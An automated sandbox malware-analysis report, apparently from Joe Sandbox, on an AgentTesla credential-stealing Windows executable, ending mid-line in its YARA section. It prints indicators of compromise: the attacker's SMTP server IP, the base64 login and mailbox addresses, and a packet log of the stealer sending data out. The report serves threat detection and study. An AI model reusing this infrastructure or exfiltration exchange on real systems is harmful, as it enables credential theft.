25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
162.254.34.31	unknown	United States		64200	VIVIDHOSTINGUS	true
172.67.74.152	api.ipify.org	United States		13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1587591
Start date and time:	2025-01-10 15:16:57 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 15s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	6
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	VYLigyTDuW.exe renamed because original name is a hash value
Original Sample Name:	56fdd77d4097b1ce3500d7178788e35731ffe0be159bca0bd1efe4e0477affa3.exe
Detection:	MAL
Classification:	mal100.spre.troj.spyw.evad.winEXE@3/1@1/2
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 99% Number of executed functions: 72 Number of non-executed functions: 50
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 20.12.23.50, 13.107.246.60
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.

Simulations

Behavior and APIs

Time	Type	Description
09:17:52	API Interceptor	168x Sleep call for process: RegAsm.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
162.254.34.31	Ref#66001032.exe	Get hash	malicious	AgentTesla	Browse
	Ref#20203216.exe	Get hash	malicious	AgentTesla	Browse
	Ref#60031796.exe	Get hash	malicious	AgentTesla	Browse
	Ref#1550238.exe	Get hash	malicious	AgentTesla	Browse
	DJ5PhUwOsM.exe	Get hash	malicious	AgentTesla, XWorm	Browse
	Ref#2056119.exe	Get hash	malicious	AgentTesla, XWorm	Browse
	Ref#501032.vbe	Get hash	malicious	MassLogger RAT	Browse
	Ref#150062.vbe	Get hash	malicious	MassLogger RAT	Browse
	BankInformation.vbe	Get hash	malicious	AgentTesla	Browse
	Booking_0731520.vbe	Get hash	malicious	AgentTesla	Browse
172.67.74.152	jgbC220X2U.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/?format=text
	malware.exe	Get hash	malicious	Targeted Ransomware, TrojanRansom	Browse	api.ipify.org/
	Simple1.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	Simple2.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	systemConfigChecker.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	systemConfigChecker.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	2b7cu0KwZl.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	Zc9eO57fgF.elf	Get hash	malicious	Unknown	Browse	api.ipify.org/
	67065b4c84713_Javiles.exe	Get hash	malicious	RDPWrap Tool	Browse	api.ipify.org/
	Yc9hcFC1ux.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
api.ipify.org	gem1.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	104.26.12.205
	https://www.tremendous.com/email/activate/yE_yBdRtyVv4Xqgg7hu_	Get hash	malicious	Unknown	Browse	172.67.74.152
	https://marcuso-wq.github.io/home/	Get hash	malicious	HTMLPhisher	Browse	172.67.74.152
	drop1.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	172.67.74.152
	https://vq6btbhdpo.nutignaera.shop/?email=YWxlamFuZHJvLmdhcnJpZG9Ac2VhYm9hcmRtYXJpbmUuY29t	Get hash	malicious	EvilProxy, HTMLPhisher	Browse	104.26.12.205
	EZZGTmJj4O.exe	Get hash	malicious	AgentTesla	Browse	104.26.13.205
	proforma invoice pdf.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	104.26.12.205
	mail (4).eml	Get hash	malicious	Unknown	Browse	172.67.74.152
	random.exe	Get hash	malicious	CStealer	Browse	104.26.12.205
	random.exe	Get hash	malicious	CStealer	Browse	172.67.74.152

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
VIVIDHOSTINGUS	Ref#66001032.exe	Get hash	malicious	AgentTesla	Browse	162.254.34.31
	Ref#20203216.exe	Get hash	malicious	AgentTesla	Browse	162.254.34.31
	arm4.elf	Get hash	malicious	Mirai	Browse	192.154.238.20
	Ref#60031796.exe	Get hash	malicious	AgentTesla	Browse	162.254.34.31
	Ref#1550238.exe	Get hash	malicious	AgentTesla	Browse	162.254.34.31
	DJ5PhUwOsM.exe	Get hash	malicious	AgentTesla, XWorm	Browse	162.254.34.31
	Ref#2056119.exe	Get hash	malicious	AgentTesla, XWorm	Browse	162.254.34.31
	sh4.elf	Get hash	malicious	Mirai	Browse	192.26.155.193
	Ref#501032.vbe	Get hash	malicious	MassLogger RAT	Browse	162.254.34.31
	Ref#150062.vbe	Get hash	malicious	MassLogger RAT	Browse	162.254.34.31
CLOUDFLARENETUS	bd9Gvqt6AK.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.80.1
	PO-0005082025 pdf.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	172.67.131.144
	zrNcqxZRSM.exe	Get hash	malicious	CobaltStrike, Metasploit	Browse	188.114.96.3
	Salary Payment Information Discrepancy_pdf.pif.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	104.21.48.1
	PO#17971.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	104.21.96.1
	http://www.lpb.gov.lr	Get hash	malicious	CAPTCHA Scam ClickFix	Browse	104.17.25.14
	https://samantacatering.com/	Get hash	malicious	Unknown	Browse	104.21.83.97
	https://sign.zoho.com/zsguest?locale=en&sign_id=234b4d535f4956237c699124bb06f6840075804affff79070f72fbd27ec4885c3a2ba06657b8a52338eb80052baee9f74c4e2e0e7f85c073df939f1ac4dff75f76c95d46ac2361c7b14335e4f12c5c5d49c49b1d2f4c838a&action_type=SIGN	Get hash	malicious	Unknown	Browse	104.17.25.14
	https://www.filemail.com/d/rxythqchkhluipl?skipreg=true	Get hash	malicious	Unknown	Browse	104.17.24.14

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	QUOTATION-9044456778.pdf (83kb).com.exe	Get hash	malicious	PureLog Stealer, Quasar	Browse	172.67.74.152
	PO#17971.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	172.67.74.152
	https://sign.zoho.com/zsguest?locale=en&sign_id=234b4d535f4956237c699124bb06f6840075804affff79070f72fbd27ec4885c3a2ba06657b8a52338eb80052baee9f74c4e2e0e7f85c073df939f1ac4dff75f76c95d46ac2361c7b14335e4f12c5c5d49c49b1d2f4c838a&action_type=SIGN	Get hash	malicious	Unknown	Browse	172.67.74.152
	IMG_10503677.exe	Get hash	malicious	MassLogger RAT	Browse	172.67.74.152
	XClient.exe	Get hash	malicious	XWorm	Browse	172.67.74.152
	RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe	Get hash	malicious	DarkTortilla, Snake Keylogger, VIP Keylogger	Browse	172.67.74.152
	1736491685cd440ba02224486139c45779065ac91a3edb422c48d3d3c6920c4d30fc9d2bfc582.dat-decoded.exe	Get hash	malicious	AsyncRAT, DcRat	Browse	172.67.74.152
	https://aqctslc.com/	Get hash	malicious	Unknown	Browse	172.67.74.152
	https://sacredartscommunications.com/	Get hash	malicious	HTMLPhisher	Browse	172.67.74.152

Dropped Files

⊘No context

Created / dropped Files

C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1002\bc49718863ee53e026d805ec372039e9_9e146be9-c76a-4720-bcdb-53011b87bd06

Download File

Process:	C:\Users\user\Desktop\VYLigyTDuW.exe
File Type:	data
Category:	dropped
Size (bytes):	46
Entropy (8bit):	1.0424600748477153
Encrypted:	false
SSDEEP:	3:/lbq:4
MD5:	8CB7B7F28464C3FCBAE8A10C46204572
SHA1:	767FE80969EC2E67F54CC1B6D383C76E7859E2DE
SHA-256:	ED5E3DCEB0A1D68803745084985051C1ED41E11AC611DF8600B1A471F3752E96
SHA-512:	9BA84225FDB6C0FD69AD99B69824EC5B8D2B8FD3BB4610576DB4AD79ADF381F7F82C4C9522EC89F7171907577FAF1B4E70B82364F516CF8BBFED99D2ADEA43AF
Malicious:	false
Reputation:	high, very likely benign file
Preview:	........................................user.

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.782767906080151
TrID:	Win32 Executable (generic) a (10002005/4) 99.94% Win16/32 Executable Delphi generic (2074/23) 0.02% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% VXD Driver (31/22) 0.00%
File name:	VYLigyTDuW.exe
File size:	1'956'616 bytes
MD5:	89471f2ae47d710f5b6db4afe8a48e77
SHA1:	903d8a21673dcc19826fa56731dc2710f2d95755
SHA256:	56fdd77d4097b1ce3500d7178788e35731ffe0be159bca0bd1efe4e0477affa3
SHA512:	6f621de51e83544a0b1aa8c65b588f553049f32d8a441a65d9b7f1fdf637c7e96af593172aadf77f6260cef3e5de78924a1032964b9412ad7eec579e4c578852
SSDEEP:	49152:ZbdYAm4zrbdYAm4zobdYAm4zvbdYAm4zdbdYAm4zZbdYAm4zpQBaYPxjFqFJ:Rdr3drCdrzdrddrRdruLPxBU
TLSH:	4F95AE43724C57ADCA630B31F63FC0A413259EBF96144B1B36CBFB2D19BA15B492A2C5
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...G..g..................... ......d.............@........................................................................

File Icon


Icon Hash:	6ced8d96b2ace4b2

Static PE Info

General

Entrypoint:	0x5aff64
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:
Time Stamp:	0x6704A147 [Tue Oct 8 03:04:39 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	e0e5cba487d80ef75c8cfd3e40cc6131

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=GlobalSign GCC R45 EV CodeSigning CA 2020, O=GlobalSign nv-sa, C=BE
Signature Validation Error:	The digital signature of the object did not verify
Error Number:	-2146869232
Not Before, Not After	29/07/2022 08:15:36 29/07/2025 08:15:36
Subject Chain	E=info@telegram.org, CN=Telegram FZ-LLC, O=Telegram FZ-LLC, L=Dubai, S=Dubai, C=AE, OID.1.3.6.1.4.1.311.60.2.1.2=Dubai, OID.1.3.6.1.4.1.311.60.2.1.3=AE, SERIALNUMBER=94349, OID.2.5.4.15=Private Organization
Version:	3
Thumbprint MD5:	D26432F60E2A3BBEB3537B78CB826828
Thumbprint SHA-1:	71AB79E1C8FF155838C37A5299AE215C52BF6D1D
Thumbprint SHA-256:	BCB22974DD56BFE9A9197D05C2D4B646F5BDF23B8BA2ACB8FD9DB1557245A407
Serial:	7AE2B5021371F092A904B6FA

Entrypoint Preview

Instruction
jmp 00007F1F34C1BE88h
add byte ptr [edx], ch
sub al, byte ptr [edx-45F135B8h]
xor eax, CC15F219h
or esp, dword ptr [ecx+1B948C81h]
lea ecx, dword ptr [edx-10h]
fldcw word ptr [esp+ebp*2+2E7A03DAh]
fdiv dword ptr [ecx+esi*8-4EBF9020h]
and ebp, dword ptr [eax+6Ah]
inc eax
adc al, AFh
inc ebx
adc byte ptr [edx-341A3688h], al
and byte ptr [bx+di], 00000046h
xchg eax, esp
dec ebx
aam C6h
std
mov ebp, EA97B917h
mov ch, 62h
mov edx, dword ptr [ebx-7181DC68h]
das
sbb byte ptr [ecx], bh
mov dword ptr [edx+4241EA4Ch], ebp
call far fword ptr [esi-34h]
outsd
jmp far C389h : 7631CD4Ch
dec eax
std
push esp
cmp bh, byte ptr [esi+12h]
mov word ptr [ecx], ds
fidivr dword ptr [ecx-50152C0Ah]
jnp 00007F1F34DCA5B9h
add ebx, dword ptr [ebp-5A9A85DDh]
retf 5FE7h
pmaddwd mm5, qword ptr [ebx+edx*4-62h]
mov esp, 4FABFBEAh
inc ebp
int 38h
xor ebp, dword ptr [edx-3781D854h]
int1
test byte ptr [esp+ecx], bl
jmp far A0D5h : 18F20BB7h
xor dh, byte ptr [eax-33h]
ror dword ptr [ecx], FFFFFF9Dh
mov esp, 1B387C29h
test eax, 610C168Fh
mov seg?, word ptr [ebp-6Eh]
or eax, 33D56245h
dec eax
mov ch, 63h
js 00007F1F34DCA62Fh
cwde
insd
retf 9ECEh
add esi, dword ptr [edx-729DEB77h]
jnle 00007F1F34DCA634h
and al, C8h
fisubr dword ptr [ebp+00h]

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x1c81d4	0x3c	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x1cd000	0x10b18	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x1db000	0x2b08	.rsrc
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x1000	0x1e4	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x1c79bc	0x1c8000	9a0ea62ca8deb2d238ae1c4360694d67	False	0.6657040244654605	data	6.83339217870378	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data	0x1c9000	0x3d24	0x1000	620f0b67a91f7f74151bc5be745b7110	False	0.00634765625	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x1cd000	0x10b18	0x11000	124c6c1cd6819c7637ca7967308b1273	False	0.08262005974264706	data	3.7429251183206045	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x1cd0e8	0x10828	Device independent bitmap graphic, 128 x 256 x 32, image size 65536, resolution 34556 x 34556 px/m			0.07952797823258015
RT_GROUP_ICON	0x1dd910	0x14	data			1.15
RT_VERSION	0x1dd924	0x1f4	data	German	Germany	0.5

Imports

DLL

Import

KERNEL32.DLL

GetProcAddress, VirtualAlloc, GetModuleHandleW

MSVBVM60.DLL

__vbaVarSub, __vbaStrI2, _CIcos, _adj_fptan, __vbaVarMove, __vbaVarVargNofree, __vbaFreeVar, __vbaLineInputStr, __vbaStrVarMove, __vbaLenBstr, __vbaFreeVarList, _adj_fdiv_m64, __vbaNextEachVar, __vbaFreeObjList, _adj_fprem1, __vbaStrCat, __vbaSetSystemError, __vbaHresultCheckObj, _adj_fdiv_m32, __vbaAryVar, __vbaAryDestruct, __vbaExitProc, __vbaOnError, __vbaObjSet, _adj_fdiv_m16i, __vbaObjSetAddref, _adj_fdivr_m16i, __vbaRefVarAry, __vbaBoolVarNull, _CIsin, __vbaErase, __vbaVargVarMove, __vbaVarZero, __vbaVarCmpGt, __vbaChkstk, __vbaFileClose, EVENT_SINK_AddRef, __vbaStrCmp, __vbaVarTstEq, DllFunctionCall, __vbaVarOr, __vbaRedimPreserve, _adj_fpatan, __vbaRedim, EVENT_SINK_Release, __vbaNew, _CIsqrt, EVENT_SINK_QueryInterface, __vbaExceptHandler, __vbaStrToUnicode, _adj_fprem, _adj_fdivr_m64, __vbaFPException, __vbaStrVarVal, __vbaUbound, __vbaVarCat, _CIlog, __vbaFileOpen, __vbaNew2, _adj_fdiv_m32i, _adj_fdivr_m32i, __vbaStrCopy, __vbaI4Str, __vbaFreeStrList, _adj_fdivr_m32, _adj_fdiv_r, __vbaI4Var, __vbaAryLock, __vbaVarAdd, __vbaVarDup, __vbaStrToAnsi, __vbaVarLateMemCallLd, __vbaVarCopy, _CIatan, __vbaStrMove, __vbaCastObj, __vbaAryCopy, __vbaStrVarCopy, __vbaForEachVar, _allmul, _CItan, __vbaAryUnlock, _CIexp, __vbaFreeObj, __vbaFreeStr

Possible Origin

Language of compilation system	Country where language is spoken	Map
German	Germany

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-10T15:17:55.647888+0100	2855245	ETPRO MALWARE Agent Tesla Exfil via SMTP	1	192.168.2.4	49735	162.254.34.31	587	TCP
2025-01-10T15:17:55.647888+0100	2855542	ETPRO MALWARE Agent Tesla CnC Exfil Activity	1	192.168.2.4	49735	162.254.34.31	587	TCP
2025-01-10T15:19:34.204660+0100	2030171	ET MALWARE AgentTesla Exfil Via SMTP	1	192.168.2.4	49735	162.254.34.31	587	TCP
2025-01-10T15:19:34.204660+0100	2840032	ETPRO MALWARE Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2	1	192.168.2.4	49735	162.254.34.31	587	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 10, 2025 15:17:51.969058990 CET	49734	443	192.168.2.4	172.67.74.152
Jan 10, 2025 15:17:51.969108105 CET	443	49734	172.67.74.152	192.168.2.4
Jan 10, 2025 15:17:51.969166994 CET	49734	443	192.168.2.4	172.67.74.152
Jan 10, 2025 15:17:52.014985085 CET	49734	443	192.168.2.4	172.67.74.152
Jan 10, 2025 15:17:52.015007019 CET	443	49734	172.67.74.152	192.168.2.4
Jan 10, 2025 15:17:52.496079922 CET	443	49734	172.67.74.152	192.168.2.4
Jan 10, 2025 15:17:52.496180058 CET	49734	443	192.168.2.4	172.67.74.152
Jan 10, 2025 15:17:52.500375032 CET	49734	443	192.168.2.4	172.67.74.152
Jan 10, 2025 15:17:52.500386953 CET	443	49734	172.67.74.152	192.168.2.4
Jan 10, 2025 15:17:52.500653028 CET	443	49734	172.67.74.152	192.168.2.4
Jan 10, 2025 15:17:52.554266930 CET	49734	443	192.168.2.4	172.67.74.152
Jan 10, 2025 15:17:52.560434103 CET	49734	443	192.168.2.4	172.67.74.152
Jan 10, 2025 15:17:52.607342958 CET	443	49734	172.67.74.152	192.168.2.4
Jan 10, 2025 15:17:52.678611040 CET	443	49734	172.67.74.152	192.168.2.4
Jan 10, 2025 15:17:52.678672075 CET	443	49734	172.67.74.152	192.168.2.4
Jan 10, 2025 15:17:52.678734064 CET	49734	443	192.168.2.4	172.67.74.152
Jan 10, 2025 15:17:52.696069002 CET	49734	443	192.168.2.4	172.67.74.152
Jan 10, 2025 15:17:53.954946995 CET	49735	587	192.168.2.4	162.254.34.31
Jan 10, 2025 15:17:53.959896088 CET	587	49735	162.254.34.31	192.168.2.4
Jan 10, 2025 15:17:53.960088968 CET	49735	587	192.168.2.4	162.254.34.31
Jan 10, 2025 15:17:54.640772104 CET	587	49735	162.254.34.31	192.168.2.4
Jan 10, 2025 15:17:54.641338110 CET	49735	587	192.168.2.4	162.254.34.31
Jan 10, 2025 15:17:54.646188021 CET	587	49735	162.254.34.31	192.168.2.4
Jan 10, 2025 15:17:54.805648088 CET	587	49735	162.254.34.31	192.168.2.4
Jan 10, 2025 15:17:54.812599897 CET	49735	587	192.168.2.4	162.254.34.31
Jan 10, 2025 15:17:54.817471981 CET	587	49735	162.254.34.31	192.168.2.4
Jan 10, 2025 15:17:54.975841999 CET	587	49735	162.254.34.31	192.168.2.4
Jan 10, 2025 15:17:54.982007027 CET	49735	587	192.168.2.4	162.254.34.31
Jan 10, 2025 15:17:54.986927032 CET	587	49735	162.254.34.31	192.168.2.4
Jan 10, 2025 15:17:55.149024963 CET	587	49735	162.254.34.31	192.168.2.4
Jan 10, 2025 15:17:55.149318933 CET	49735	587	192.168.2.4	162.254.34.31
Jan 10, 2025 15:17:55.154217958 CET	587	49735	162.254.34.31	192.168.2.4
Jan 10, 2025 15:17:55.315458059 CET	587	49735	162.254.34.31	192.168.2.4
Jan 10, 2025 15:17:55.316905022 CET	49735	587	192.168.2.4	162.254.34.31
Jan 10, 2025 15:17:55.321661949 CET	587	49735	162.254.34.31	192.168.2.4
Jan 10, 2025 15:17:55.483536959 CET	587	49735	162.254.34.31	192.168.2.4
Jan 10, 2025 15:17:55.483849049 CET	49735	587	192.168.2.4	162.254.34.31
Jan 10, 2025 15:17:55.488627911 CET	587	49735	162.254.34.31	192.168.2.4
Jan 10, 2025 15:17:55.647083998 CET	587	49735	162.254.34.31	192.168.2.4
Jan 10, 2025 15:17:55.647860050 CET	49735	587	192.168.2.4	162.254.34.31
Jan 10, 2025 15:17:55.647887945 CET	49735	587	192.168.2.4	162.254.34.31
Jan 10, 2025 15:17:55.647962093 CET	49735	587	192.168.2.4	162.254.34.31
Jan 10, 2025 15:17:55.647991896 CET	49735	587	192.168.2.4	162.254.34.31
Jan 10, 2025 15:17:55.652754068 CET	587	49735	162.254.34.31	192.168.2.4
Jan 10, 2025 15:17:55.652770042 CET	587	49735	162.254.34.31	192.168.2.4
Jan 10, 2025 15:17:55.652828932 CET	587	49735	162.254.34.31	192.168.2.4
Jan 10, 2025 15:17:55.652837992 CET	587	49735	162.254.34.31	192.168.2.4
Jan 10, 2025 15:17:55.935142994 CET	587	49735	162.254.34.31	192.168.2.4
Jan 10, 2025 15:17:55.979136944 CET	49735	587	192.168.2.4	162.254.34.31
Jan 10, 2025 15:19:34.024667025 CET	49735	587	192.168.2.4	162.254.34.31
Jan 10, 2025 15:19:34.029546976 CET	587	49735	162.254.34.31	192.168.2.4
Jan 10, 2025 15:19:34.204513073 CET	587	49735	162.254.34.31	192.168.2.4
Jan 10, 2025 15:19:34.204659939 CET	49735	587	192.168.2.4	162.254.34.31
Jan 10, 2025 15:19:34.204720020 CET	587	49735	162.254.34.31	192.168.2.4
Jan 10, 2025 15:19:34.205461979 CET	49735	587	192.168.2.4	162.254.34.31
Jan 10, 2025 15:19:34.209542036 CET	587	49735	162.254.34.31	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 10, 2025 15:17:51.957453012 CET	62625	53	192.168.2.4	1.1.1.1
Jan 10, 2025 15:17:51.963998079 CET	53	62625	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 10, 2025 15:17:51.957453012 CET	192.168.2.4	1.1.1.1	0x8987	Standard query (0)	api.ipify.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Jan 10, 2025 15:17:51.963998079 CET	1.1.1.1	192.168.2.4	0x8987	No error (0)	api.ipify.org	172.67.74.152	A (IP address)	IN (0x0001)	false
Jan 10, 2025 15:17:51.963998079 CET	1.1.1.1	192.168.2.4	0x8987	No error (0)	api.ipify.org	104.26.12.205	A (IP address)	IN (0x0001)	false
Jan 10, 2025 15:17:51.963998079 CET	1.1.1.1	192.168.2.4	0x8987	No error (0)	api.ipify.org	104.26.13.205	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

api.ipify.org

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49734	172.67.74.152	443	7360	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 14:17:52 UTC	155	OUT	GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 Host: api.ipify.org Connection: Keep-Alive
2025-01-10 14:17:52 UTC	424	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 14:17:52 GMT Content-Type: text/plain Content-Length: 12 Connection: close Vary: Origin CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 8ffd4b07dde1729b-EWR server-timing: cfL4;desc="?proto=TCP&rtt=2009&min_rtt=2007&rtt_var=758&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2820&recv_bytes=769&delivery_rate=1438423&cwnd=250&unsent_bytes=0&cid=41b993148e57fe98&ts=195&x=0"
2025-01-10 14:17:52 UTC	12	IN	Data Raw: 38 2e 34 36 2e 31 32 33 2e 31 38 39 Data Ascii: 8.46.123.189

SMTP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP	Commands
Jan 10, 2025 15:17:54.640772104 CET	587	49735	162.254.34.31	192.168.2.4	220 server1.educt.shop ESMTP Postfix
Jan 10, 2025 15:17:54.641338110 CET	49735	587	192.168.2.4	162.254.34.31	EHLO 284992
Jan 10, 2025 15:17:54.805648088 CET	587	49735	162.254.34.31	192.168.2.4	250-server1.educt.shop 250-PIPELINING 250-SIZE 204800000 250-ETRN 250-STARTTLS 250-AUTH PLAIN LOGIN 250-AUTH=PLAIN LOGIN 250-ENHANCEDSTATUSCODES 250-8BITMIME 250-DSN 250 CHUNKING
Jan 10, 2025 15:17:54.812599897 CET	49735	587	192.168.2.4	162.254.34.31	AUTH login c2VuZHhzZW5zZXNAdmV0cnlzLnNob3A=
Jan 10, 2025 15:17:54.975841999 CET	587	49735	162.254.34.31	192.168.2.4	334 UGFzc3dvcmQ6
Jan 10, 2025 15:17:55.149024963 CET	587	49735	162.254.34.31	192.168.2.4	235 2.7.0 Authentication successful
Jan 10, 2025 15:17:55.149318933 CET	49735	587	192.168.2.4	162.254.34.31	MAIL FROM:<sendxsenses@vetrys.shop>
Jan 10, 2025 15:17:55.315458059 CET	587	49735	162.254.34.31	192.168.2.4	250 2.1.0 Ok
Jan 10, 2025 15:17:55.316905022 CET	49735	587	192.168.2.4	162.254.34.31	RCPT TO:<senses@vetrys.shop>
Jan 10, 2025 15:17:55.483536959 CET	587	49735	162.254.34.31	192.168.2.4	250 2.1.5 Ok
Jan 10, 2025 15:17:55.483849049 CET	49735	587	192.168.2.4	162.254.34.31	DATA
Jan 10, 2025 15:17:55.647083998 CET	587	49735	162.254.34.31	192.168.2.4	354 End data with <CR><LF>.<CR><LF>
Jan 10, 2025 15:17:55.647991896 CET	49735	587	192.168.2.4	162.254.34.31	.
Jan 10, 2025 15:17:55.935142994 CET	587	49735	162.254.34.31	192.168.2.4	250 2.0.0 Ok: queued as 63C3E600E9
Jan 10, 2025 15:19:34.024667025 CET	49735	587	192.168.2.4	162.254.34.31	QUIT
Jan 10, 2025 15:19:34.204513073 CET	587	49735	162.254.34.31	192.168.2.4	221 2.0.0 Bye

Target ID:	0
Start time:	09:17:47
Start date:	10/01/2025
Path:	C:\Users\user\Desktop\VYLigyTDuW.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\VYLigyTDuW.exe"
Imagebase:	0x400000
File size:	1'956'616 bytes
MD5 hash:	89471F2AE47D710F5B6DB4AFE8A48E77
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1704627717.00000000006D1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000003.1704627717.00000000006D1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1706415121.00000000023A2000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.1706415121.00000000023A2000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1698582949.00000000040B1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: 